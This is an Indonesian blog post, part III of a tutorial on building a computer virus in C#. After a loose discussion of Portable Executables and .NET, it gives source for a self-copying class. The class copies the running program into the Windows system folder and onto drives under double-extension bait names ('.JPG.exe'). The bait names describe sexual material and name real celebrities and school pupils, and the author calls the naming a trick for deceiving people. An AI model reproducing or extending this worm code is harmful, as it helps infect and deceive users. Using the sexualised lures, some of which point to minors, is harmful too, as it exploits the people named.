Apr 19, 2015

Tutorial Pembuatan Virus Part III

Selamat siang, selamat bertemu lagi . Mumpung hari minggu dan tidak ada kerjaan, karena sepertinya semua dead-line project sudah teratasi, mari kita bikin sesuatu yang bener-bener tidak berguna. Seperti omongan saya pada Part II, kali ini saya akan membahas masalah Portable Executable dan nanti di akhir pembahasan akan masuk sedikit ke class Gandakan.
Portable Executable ?. Apa sebenarnya Portable Executable itu ?. Saya akan menjelaskan dengan bahasa saya atas dasar pengetahuan yang saya miliki, dan yang perlu di ingat bahwa “Bisa jadi saya salah, tapi ada kemungkinan juga saya benar”. Portable Executable menurut bahasa saya adalah aplikasi atau pogram yang dapat di jalankan (dieksekusi) oleh sebuah sistem operasi dan dapat di pindahkan atau di jalankan dari satu komputer ke komputer lain tanpa harus melakukan perubahan, atau re-code atau re-compile. Jadi dengan bahasa saya tersebut, bisa dikatakan SEMUA aplikasi yang berjalan pada sistem operasi Modern adalah Portable Executable. Pertanyaan selanjutnya mungkin akan timbul “Bagaimana dengan aplikasi-aplikasi portable yang tanpa installasi ?”, Proses installasi program pada dasarnya hanya meng-copy-paste-kan executable file ke dalam storage, dan memastikan semua komponen yang dibutuhkan telah eksis pada komputer bersangkutan. Komponen yang dibutuhkan seperti contoh file dll, library dslb. Jadi aplikasi-aplikasi portable yang sering kita jumpai di forum-forum crack itu pada dasarnya adalah executable file yang di paket menjadi satu dengan file-file pendukungnya, sehingga kita tidak harus melakukan copy-paste (baca installasi) pada komputer yang bersangkutan.
Sebelum melanjutkan pembahasan, mungkin banyak dari anda sekalian khususnya yang sedang kuliah jurusan komputer atau baru lulus kuliah komputer akan bingung dengan penjelasan saya diatas. Kalau anda bingung itu pasti, karena dulu saya juga bingung, sebelum akhirnya saya reformat otak atas informasi yang saya dapatkan sewaktu kuliah, dan me-replace-nya dengan informasi-informasi baru yang saya dapatkan dari ebook download-an. Memang menurut saya konsep komputer, sistem operasi, processor, dan lain sebagainya yang diajarkan di Kampus sudah banyak ketinggalan jaman, atau paling tidak sudah tidak sesuai dengan keadaan sekarang. Tetapi jangan khawatir, dasar pemikirannya belum berubah, hanya implementasinya saja yang berubah, jadi ilmu yang anda dapatkan di kampus masih bermanfaat, paling tidak sebagai pengetahuan dasar.
Setelah dijelaskan mengenai Portable Executable mestinya akan ada pertanyaan yang mendasar “Portable Executable ?, loh kok .Net Framework ?”. Pada Part I saya sudah mengatakan bahwa aplikasi virus akan dibangun menggunakan C# dengan .Net Framework 2.0. Melihat namanya Framework, orang biasanya akan langsung berpikir “Lah kan berarti itu middleware yang artinya aplikasi tidak berjalan native”. Terus terang saja, saya bingung dengan konsep Framework dan Middleware. Framework dan Middleware buat saya dua hal yang berbeda. Mungkin orang akan selalu menghubungkan hal tersebut karena dulu awal-awal bumming kata-kata tersebut populer bareng bersamaan dengan kepopuleran bahasa JAVA. Buat saya Framework ya Framework, dia kerangka kerja, garis acuan dalam pengembangan sebuah aplikasi, dan Middleware adalah sebuah aplikasi lain yang menjembatani antara sebuah aplikasi dengan sistem operasi, sebagai contoh JVM yang akan menterjemahkan bitcode yang dihasilkan dari Java Compiller ke bahasa yang dimengerti processor dan bersesuaian dengan Sistem Operasi yang digunakan. Pertanyaan selanjutnya adalah “Apakah aplikasi yang dibangun dengan C# atau VB .Net dengan .Net Framework Native ?, karena kan butuh .Net Framework yang terinstall di Sistem Operasi.” Jika pertanyaan yang kurang lebih begitu ditanyakan kepada saya, dan beberapa orang juga sudah bertanya, saya ingin bertanya balik “VB6 Native ?, Visual C++ Native ?, Delphi Native ?”. Seperti juga aplikasi .Net yang membutuhkan file-file pendukung yang terpaket dalam .Net Framework aplikasi-aplikasi yang dikembangkan dengan bahasa2 tersebut juga pada dasarnya membutuhkan file-file pendukung yang “secara default sudah ada pada sistem operasi”.
Pembahasan mengenai Portable Executable untuk kali ini saya cukupkan segitu, karena kalau di bahas lebih lanjut, bisa-bisa dua kali puasa dua kali lebarang belum kelar juga Part III ini. Langsung saja buka Visual Studio dan open project “viruses”, kemudian click dua kali pada file  Gandakan.cs untuk membuka file editor dan ketikan kode berikut


using System;
using System.IO;
using System.Windows.Forms;

namespace Viruses.Logic
{
    class Gandakan
    {
        private readonly string[] _names = { "janda.JPG.exe", "ariel sex tape.JPG.exe", "chika bandung.JPG.exe", 
                                             "Lisa Poltek Bandung.JPG.exe", "Maria Ozawa.JPG.exe", 
                                             "JAV artis.JPG.exe", "SMA Slawi bugil.JPG.exe", "bugil kamar mandi.JPG.exe",
                                             "smp 4 jakarta ngentot.JPG.exe", "nabila JKT48 telanjang.JPG.exe"
                                           };
        private readonly Random _random = new Random();

        public Boolean CopySystem()
        {
            try
            {
                File.Copy(Application.ExecutablePath, Environment.SystemDirectory + "/thevirus.exe", true);
            }
            catch (Exception)
            {
                return false;
            }
            return true;
        }

        public Boolean CopyDrive(string driveValue)
        {
            try
            {
                var index = _random.Next(0, _names.Length);
                if (!Application.ExecutablePath.Equals(driveValue + _names[index]))
                {
                    File.Copy(Application.ExecutablePath, driveValue + _names[index], true);
                }
            }
            catch (Exception)
            {
                return false;
            }
            return true;
        }

        public Boolean CopyTo(string destinationValue)
        {
            try
            {
                if (!File.Exists(destinationValue))
                {
                    File.Copy(Application.ExecutablePath, destinationValue, true);
                }
            }
            catch (Exception)
            {
                return false;
            }
            return true;
        }
    }
}
Penjelasan dari Code diatas kurang lebih seperti ini :

  1. Variable Array String _names, adalah variable yang digunakan untuk menyimpan nama file hasil penggandaan diri. Ini adalah teknik pengecohan, memang teknik kuno tetapi sampai hari ini menurut saya masih sangat efektif, tinggal pinter-pinter kita melakukan trik untuk menipu orang.
  2. Fungsi CopySystem, adalah fungsi yang digunakan untuk meng-copy-kan aplikasi virus ke System Windows. Fungsi ini membutuhkan Administrator Privileges, tapi jangan takut, setelah nanti banyak Part tentang pengetahuan dasar selesai di tulis akan saya jelaskan tentang mengakali hal ini.
  3. Fungsi CopyDrive, adalah fungsi yang berguna untuk meng-copy-kan aplikasi virus ke Drive active.
  4. Fungsi CopyTo, adalah fungsi yang berguna untuk meng-copy-kan aplikasi virus ke target path sesuai dengan definisi.

Untuk kali ini saya cukupkan sampai sekian dulu, dan hal yang perlu diingat adalah Saya kehilangan semua Source Code lama saya karena HDD bad-sector tanpa sempat melakukan backup, dan semua data dan code-code yang saya punya hilang semua. Jadi Code-code dalam tulisan ini dan tulisan-tulisan selanjutnya adalah Code baru, dan saya sendiri belum mengujinya jadi ada kemungkinan code error. Sambil jalan akan saya benerin, jadi ada kemungkinan nanti ke depan akan ada refisi-refisi kode. Terima Kasih.

Powered by Blogger.

Whatsapp Button works on Mobile Device only

Start typing and press Enter to search